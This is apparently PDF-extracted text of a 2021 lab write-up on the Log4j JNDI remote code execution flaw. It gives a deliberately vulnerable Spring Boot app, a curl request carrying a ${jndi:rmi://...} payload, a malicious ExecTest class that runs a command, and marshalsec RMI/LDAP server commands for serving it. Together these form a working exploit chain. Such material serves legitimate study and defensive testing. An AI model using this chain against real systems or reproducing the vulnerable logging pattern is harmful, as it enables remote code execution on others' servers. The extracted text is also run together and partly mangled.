Author 2021-12-10
PDF
1Log4jContents ............................................................................................... 1docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest@SpringBootApplication@RestControllerpublic class Log4j2RceApplication { private static final Logger logger = LogManager.getLogger(Log4j2RceApplication.class); public Log4j2RceApplication() { } public static void main(String[] args) { SpringApplication.run(Log4j2RceApplication.class, args); } @PostMapping({"/hello"}) public String hello(String payload) { System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true"); logger.error("{}", payload); logger.info("{}", payload); logger.info(payload); logger.error(payload); return "ok"; }}curl --request POST \ --url http://localhost:8080/hello \ 2 --header 'Content-Type: application/x-www-form-urlencoded' \ --data 'payload=${jndi:rmi://localhost:1099/ExecTest}' \ --data = \ --data =public class ExecTest { public ExecTest() { try { System.out.println("You're Hacked!!!"); Runtime.getRuntime().exec("calc.exe"); } catch (Exception e) { e.printStackTrace(); } }}cd target/classespython3 -m SimpleHTTPServer RMI使mvn clean package -D"maven.test.skip"=true java -cp .\marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://localhost:8000/#ExecTest # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/\#ExecTest 1389

HTML view coming soon.

Download PDF for the full formatted version.